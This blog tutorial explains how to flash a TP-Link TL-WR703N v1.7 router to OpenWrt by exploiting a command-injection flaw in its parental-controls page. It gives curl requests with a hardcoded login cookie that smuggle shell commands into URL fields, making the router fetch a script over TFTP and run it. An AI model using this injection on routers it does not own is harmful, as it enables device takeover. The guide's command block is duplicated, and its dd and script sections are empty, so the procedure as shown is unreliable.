Flashing TP-Link TL-WR703N v1.7 to OpenWrt

The TP-Link TL-WR703N is an affordable 3G-capable travel router that is able to provide wireless access for your devices while you are in hotel (with wired LAN) or on the move (using a supported USB 3G dongle). I got a couple of these for less than US$17 each. This little gem supports 3rd party firmwares like OpenWrt and dd-wrt.

Flashing the TL-WR703N to OpenWrt is easy for the version 1.6 hardware as you can simply perform a firmware upgrade (to OpenWrt) through the TP-Link’s Web administration page.

However, it is no longer possible with the TL-WR703N with version 1.7 hardware on firmware 3.17.1 Build 140120 Rel.56593n. Firstly, the U-Boot was changed for TL-WR703N v1.7. Secondly, the official firmware no longer allows firmware firmware to OpenWrt via the TP-Link’s Web administration page. Attempts to do usually result in bricking the TL-WR703N and the only way to recover is to re-flash it via its serial interface.

The proper way to flash the TL-WR703N v1.7 is to leverage an exploit on the parental controls page (credits to BUGBLUE). It would allow you to run privileged commands on the TL-WR703N v1.7 to:

1. Transfer both the kernel and rootfs image of OpenWrt firmware
2. Flash the kernel partition
3. Flash the rootfs partition

The instructions were a little unclear so I am documenting it down for (my) future reference.

Getting the Required Stuffs

To flash the TL-WR703N v1.7 to OpenWrt, you will need the following:

1. TL-WR703N v1.7 on firmware 3.17.1 Build 140120 Rel.56593n
2. OpenWrt firmware for TL-WR703N [download]
3. cURL to send crafted http queries [download]
4. dd to split the OpenWrt into kernel and rootfs image [download]
5. TFTP server [download]
6. A shell script to instruct the router to perform the flashing. You will need a editor (e.g. Notepad++) to create the shell script with Unix style for End of Line
7. busybox 1.16.1 for mips [download]

Preparing the Stuffs to exploit the TL-WR703N

Splitting the OpenWrt firmware into kernel and rootfs

Creating the shell script “aa”

Create a file named “aa” (without the quotes and extension) with the following contents. Alternatively, you can download the aa file (remember to unzip it).

Renaming the busybox-mips

Rename the “busybox-mips” you have downloaded earlier to “busybox”

Setting your LAN address on your computer

The exploit command and shell script (aa) communicates to the address 192.168.1.9. You can either set this static IP on your computer or modify the address in the exploit command and shell script. Your choice!

Setting up the TFTP server with the required files

By now, you would have the following 4 files:

1. aa
2. i1
3. i2
4. busybox

Extract and execute the TFTP server and point the document root to the folder containing the above 4 files.

Pulling the exploit and upgrading TL-WR703N to OpenWrt

Connecting up the equipment and factory resetting the router

1. Connect the LAN cable to both your computer and the TL-WR703N.
2. Power on the TL-WR703N.
3. Through the TP-Link Web administration page, perform a factory reset for TL-WR703N.

Performing the exploit and upgrade

Ensure that your computer is set to static address 192.168.1.9.

1. On your command prompt, navigate to the directory containing cURL.
2. Execute the following commands (those lines starting with # are comments which need not be executed).
   
   Upgrading the TL-WR703N to OpenWrt

   curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true" "http://192.168.1.1/" curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1" curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6" # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).

   1 2 3 4

   curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true" "http://192.168.1.1/" curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1" curl -o - -b "tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6" # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).

3. Once the power LED stops blinking, access the OpenWrt Web administration at http://192.168.1.1.
4. Enjoy your TL-WR703N v1.7 on OpenWrt.

Upgrading OpenWrt in the Future

Do take caution when upgrading firmware in the future as the u-boot has not been replaced. You should not reset settings or reset to factory default in any situation.

 

Treat shadowandy!

If these step-by-step guides have been very helpful to you and saved you a lot of time, please consider treating shadowandy to a cup of Starbucks.